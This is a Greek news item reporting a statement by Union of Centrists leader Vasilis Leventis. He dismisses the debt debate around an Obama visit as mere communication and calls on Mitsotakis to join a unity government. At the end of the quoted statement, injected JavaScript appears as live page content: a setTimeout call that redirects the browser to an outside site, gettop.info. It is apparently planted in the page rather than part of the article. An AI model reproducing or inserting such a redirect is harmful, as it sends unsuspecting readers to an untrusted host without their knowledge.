Λεβέντης: Η όλη συζήτηση για το χρέος έχει μόνο επικοινωνιακό χαρακτήρα

0
6

 

«Κακώς η κυβέρνηση ανεβάζει τις προσδοκίες από την επίσκεψη Ομπάμα για την μείωση του χρέους», δηλώνει με ανακοίνωσή του ο Βασίλης Λεβέντης, εξηγώντας ότι «το χρέος έχει περιέλθει στα κράτη της Ευρώπης, και για την όποια ρύθμισή του απαιτείται απόφαση των κοινοβουλίων. Επομένως, η όλη συζήτηση για το χρέος έχει μόνο επικοινωνιακό χαρακτήρα».

Ο πρόεδρος της Ένωσης Κεντρώων, υποστηρίζει ότι «αυτή η ώρα, είναι ώρα ειλικρίνειας και καλό είναι στο λαό να λέγεται η αλήθεια. Χωρίς επενδύσεις, χωρίς πολιτική σταθερότητα, χωρίς εθνικό σχεδιασμό, χωρίς εφαρμογή των μεταρρυθμίσεων, οι εξελίξεις θα είναι άσχημες για την Ελλάδα. Και η ΝΔ αρνείται να δει κατά πρόσωπο την πραγματικότητα.

Ακόμη και αν έλθει στην εξουσία και κάνει κυβέρνηση με την κα Γεννηματά, η κυβέρνηση στην καλύτερη περίπτωση θα αριθμεί 153 βουλευτές, συνεπώς δεν θα είναι η κυβέρνηση που θα φέρει επενδύσεις.

Καλό θα είναι λοιπόν, ο κ. Μητσοτάκης να σταματήσει εξουσιομανείς σκέψεις του και να προσέλθει στο τραπέζι της οικουμενικής. Εκατό «Ομπάμες» να έρθουν στην Ελλάδα, όσο υπάρχει φαγωμάρα στο πολιτικό σύστημα, η χώρα θα ζει στον αστερισμό των μνημονίων και των δανείων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here